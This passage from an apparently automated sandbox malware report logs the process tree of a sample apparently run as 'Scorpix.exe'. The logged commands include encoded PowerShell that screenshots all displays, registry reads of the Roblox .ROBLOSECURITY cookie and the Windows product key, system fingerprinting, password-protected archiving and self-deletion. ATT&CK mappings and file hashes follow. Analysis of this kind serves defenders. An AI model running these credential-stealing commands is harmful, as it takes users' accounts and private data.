gAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=6⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\l225zjtv\l225zjtv.cmdline"7⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD21D.tmp" "c:\Users\Admin\AppData\Local\Temp\l225zjtv\CSCEEAEC3D989F445BFBCFCB729EFEDD1DF.TMP"8⤵
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵
-
C:\Windows\system32\tree.comtree /A /F6⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"5⤵
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts6⤵
- Drops file in Drivers directory
- Views/modifies file attributes
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵
-
C:\Windows\system32\tree.comtree /A /F6⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"5⤵
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts6⤵
- Drops file in Drivers directory
- Views/modifies file attributes
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵
-
C:\Windows\system32\tree.comtree /A /F6⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵
-
C:\Windows\system32\tree.comtree /A /F6⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵
-
C:\Windows\system32\tree.comtree /A /F6⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY6⤵
- Command and Scripting Interpreter: PowerShell
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"5⤵
-
C:\Windows\system32\getmac.exegetmac6⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY6⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI77082\rar.exe a -r -hp"yelex123" "C:\Users\Admin\AppData\Local\Temp\8OMF7.zip" *"5⤵
-
C:\Users\Admin\AppData\Local\Temp\_MEI77082\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI77082\rar.exe a -r -hp"yelex123" "C:\Users\Admin\AppData\Local\Temp\8OMF7.zip" *6⤵
- Executes dropped EXE
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"5⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption6⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"5⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory6⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"5⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid6⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER6⤵
- Command and Scripting Interpreter: PowerShell
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault6⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\Desktop\Release of V3\Scorpix.exe""5⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
C:\Windows\system32\PING.EXEping localhost -n 36⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"1⤵
-
C:\Windows\System32\control.execontrol2⤵
-
-
C:\Windows\System32\Taskmgr.exetaskmgr2⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SendNotifyMessage
-
-
C:\Windows\System32\taskkill.exetaskkill /f /im /winlogon.exe2⤵
- Kills process with taskkill
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -Embedding1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}1⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\System32\ec4pya.exe"C:\Windows\System32\ec4pya.exe"1⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffe7febcc40,0x7ffe7febcc4c,0x7ffe7febcc582⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1572,i,14105342740050046932,11466772127489070437,262144 --variations-seed-version=20240725-180135.596000 --mojo-platform-channel-handle=1580 /prefetch:22⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1964,i,14105342740050046932,11466772127489070437,262144 --variations-seed-version=20240725-180135.596000 --mojo-platform-channel-handle=2148 /prefetch:32⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2224,i,14105342740050046932,11466772127489070437,262144 --variations-seed-version=20240725-180135.596000 --mojo-platform-channel-handle=2596 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3088,i,14105342740050046932,11466772127489070437,262144 --variations-seed-version=20240725-180135.596000 --mojo-platform-channel-handle=3228 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3156,i,14105342740050046932,11466772127489070437,262144 --variations-seed-version=20240725-180135.596000 --mojo-platform-channel-handle=3264 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4488,i,14105342740050046932,11466772127489070437,262144 --variations-seed-version=20240725-180135.596000 --mojo-platform-channel-handle=4332 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4652,i,14105342740050046932,11466772127489070437,262144 --variations-seed-version=20240725-180135.596000 --mojo-platform-channel-handle=4288 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4936,i,14105342740050046932,11466772127489070437,262144 --variations-seed-version=20240725-180135.596000 --mojo-platform-channel-handle=4952 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4940,i,14105342740050046932,11466772127489070437,262144 --variations-seed-version=20240725-180135.596000 --mojo-platform-channel-handle=5112 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe7febcc40,0x7ffe7febcc4c,0x7ffe7febcc582⤵
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵
-
C:\Windows\System32\ec4pya.exe"C:\Windows\System32\ec4pya.exe"1⤵
-
C:\Windows\System32\ec4pya.exe"C:\Windows\System32\ec4pya.exe"1⤵
-
C:\Windows\System32\ec4pya.exe"C:\Windows\System32\ec4pya.exe"1⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell2⤵
-
C:\Windows\system32\wininit.exe"C:\Windows\system32\wininit.exe"3⤵
-
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
Hide Artifacts
2Hidden Files and Directories
2Modify Registry
1Obfuscated Files or Information
1Command Obfuscation
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Discovery
Browser Information Discovery
1Peripheral Device Discovery
1Process Discovery
1Query Registry
3Remote System Discovery
1System Information Discovery
6System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
2Internet Connection Discovery
1Wi-Fi Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
64KB
MD5b5ad5caaaee00cb8cf445427975ae66c
SHA1dcde6527290a326e048f9c3a85280d3fa71e1e22
SHA256b6409b9d55ce242ff022f7a2d86ae8eff873daabf3a0506031712b8baa6197b8
SHA51292f7fbbcbbea769b1af6dd7e75577be3eb8bb4a4a6f8a9288d6da4014e1ea309ee649a7b089be09ba27866e175ab6f6a912413256d7e13eaf60f6f30e492ce7f
-
Filesize
4B
MD5f49655f856acb8884cc0ace29216f511
SHA1cb0f1f87ec0455ec349aaa950c600475ac7b7b6b
SHA2567852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba
SHA512599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8
-
Filesize
1008B
MD5d222b77a61527f2c177b0869e7babc24
SHA13f23acb984307a4aeba41ebbb70439c97ad1f268
SHA25680dc3ffa698e4ff2e916f97983b5eae79470203e91cb684c5ccd4ff1a465d747
SHA512d17d836ea77aeaff4cd01f9c7523345167a4a6bc62528aac74acde12679f48079d75d159e9cea2e614da50e83c2dcd92c374c899ea6c4fe8e5513d9bf06c01ff
-
Filesize
40B
MD55bf9a67cc11614da7223088e27c3fa19
SHA126807c19da9bfc6f001056075666ed941ab446c2
SHA256660462077376ded7e4ba358dcda13ba6b9328b0730701fdf1ef6236ee98fd192
SHA512adf717603db99ca4aa43a0f2ab7e625c4fe55a9246ea2d62341fd2756795188a15797d49d5b02a54a7c755e11a40177ab96ed34ea0639f663554e536c9e4142a
-
Filesize
649B
MD5b7c4b252f07312fc2a365fe7d8d27605
SHA1eff5604c67f7444358c61b5d8beb6e2f1a7b1abf
SHA256ca8412cd3dc83998bf536d563744e48a4d847c0f3a0f64db7ee585fc3e65c2d2
SHA512672070b83ea5f4bfc0079b1360be8dc68c7b4e6b75ea4f28bbef6640fa736f3f2e4c4f30c610bace06b35fd7ff1ad99c443b9b18892c1a3257e35f3a12e57987
-
Filesize
210KB
MD55ac828ee8e3812a5b225161caf6c61da
SHA186e65f22356c55c21147ce97903f5dbdf363649f
SHA256b70465f707e42b41529b4e6d592f136d9eb307c39d040d147ad3c42842b723e7
SHA51287472912277ae0201c2a41edc228720809b8a94599c54b06a9c509ff3b4a616fcdd10484b679fa0d436e472a8fc062f4b9cf7f4fa274dde6d10f77d378c06aa6
-
Filesize
984B
MD5cd5c295c35e99caff430fd537fe91b30
SHA132d2c6a3676843767ef4282a8611de6dee87e90e
SHA2561aaf198cfcf3e4ff2e33404b9a14d95ff050c9b7b96fa1d6266e3f623e689ec1
SHA51259cc69a2bfa1b7da2647a310614675a4860d4dc93218a12540afa52e8bbf2e39da9de720e78c9fe11791486daca8024bd64004e0253802a65a936045627fa97d
-
Filesize
216B
MD513707a5c0d87d48ddaca7db497dea876
SHA1f4a04ee16afcf7e76471dbd9645676ae88c7c2ae
SHA256406394534d97447d2bbc2460212ce56ccb8c9ab2c43ea4a933ac0e7cbe805019
SHA5124fd424cbafe1ac16d905d49e65a8b6c6d0a96f5bab73f9342fcc961e4da38bfadba309d39e1c28d784bf66822f6d079260f1fc7585244be2641821b387924744
-
Filesize
1KB
MD5f4b9675b69671abf79607f57db9eab14
SHA13bc08d4f821953bfebfbfe8accc5316ff0434303
SHA2566a1e88ed99f2420d47c2fd8e16ad49047a0c4ed0f885bc35a757a5c7a3d0b9e7
SHA512f535198c34d976e9715a76cafad6a1e47d9a01f25e3142296a97d006b0ce5db47da94e6a2cea78e7e5b509a6b021d7ce0df932b01ce14fca8fec1413e3297870
-
Filesize
2KB
MD5ab017940ef856745e06c51328aa5d461
SHA1010b0adc2b66013b9c052b406d00c06ca242d791
SHA2565c90297f6bbb7d3addbc5aa401bbf3d2cf8a3e645e30f7a2ad0368226f03ca8b
SHA512b5fffdffa4bb329ddb586fca9a62e7e46ef3da10d9916afb658e88f6204177eea6416df981a9a0872e86dc64a91cdb5ca171fc7829ca71016fd6a40ff38188d7
-
Filesize
7KB
MD55b39da1d0c6d9bdd20b8e28f2b3c5b82
SHA15d299d0325c1accaafc417b50160ae4b27c3e839
SHA256675d14c88babab0a241fefc558ffffd9c65de6443cb07d6834edafcfbfe55e28
SHA512565eaf0ec6f071e28be3f68aeaecbd0a20eb62e963bedbe45f4a952e820c9deac2c8430393a53c6d78a1a2642e66cd430a0514cf48c94a8f7a18cd494dc8a1a3
-
Filesize
7KB
MD564de9c9c8c51c3a717fdcc6340adfb0d
SHA15de826a88a6456b6adc5e9cd1967b3646cb13e7b
SHA25655b3206cceb4f4db59a6b9627f07df48f16839dce20bbeb2126d2d55d0e041c1
SHA5127ab529d8dae70921cf1bf243a372af1a8eed3fb7e226ef16df4770e67446ab5daefdbad024ae98087def28540ec4b9143cc850b2b3056a53038a4599a4a3b8ba
-
Filesize
2KB
MD53f33a2d3ed472b38851c2954cf6531b5
SHA1742fe2a607371cb15128bedfdd1b5366fd9512f6
SHA2560bab6126683ee28fbbe3527407d9bf09ea8a51d07739daa7061ed7f217615e56
SHA512a7fc909abf561b813af84baa56588c59949fc0c75e4fd056895aa69b9e2dfd39a5a12ee61fcb471df4cbda8f3822bea48b5715489c90c4511d7f3e1f1113d4a7
-
Filesize
7KB
MD5c37b024fc2d7008b423f637944b1b630
SHA1753a2ab59a9f9a6fd39b3efb7f78e07b0acfc083
SHA2568e762b36d036151ab49a1a6e4389c82e08cfa38be0b762b5d9e6822eddc5552b
SHA5122bf5e403d6ddc359d261f7235a26a8ff47382ce1d1827aed31bf5091817e1d98831f77811bebc2641924c90f467083ecb0640ec7cd80ede318eefbfd8e7c1c69
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
356B
MD5f50f74561f16ce21ab621273adc8f31e
SHA1d5751c4def464d2084a0714a0940530c6731059e
SHA25675ef0d37643b5272bf19cd286c6864fbd21684994150fc72264a0903650f87a1
SHA5128b33b446470f1b1652ef6395570d37f6bb772738a952b2a0377c5adefbc7c3b2519653643666cceb30c34a6d78db921f6c12165900d951c7ae6502e606e1782a
-
Filesize
524B
MD5f71c0f8e24ab24672ecca66d71b6ba66
SHA12a92cfae3e341be86904508eb0279e9664c1f1f3
SHA256337d6663917744807fc80955c89a7ef4a2bc1dbc28cc7e43a115c65b34ee309a
SHA5127a68c47414360df2954b1924d7661af30ff2d44bd7c323d2a0ae437fe70adfcf7db3dc678b5c37c1b1289047221345beb476b2d590ec321f5c5877dcd4de8b71
-
Filesize
691B
MD5cfa8dce87a27eb16039c697a6a684a13
SHA19ea2f31348479ea197079e1542dc9f8d3982501f
SHA2569772bc498dde4fa509d560b6d99ea4806aa96ed2456ea244763c1d3b8ad71cc5
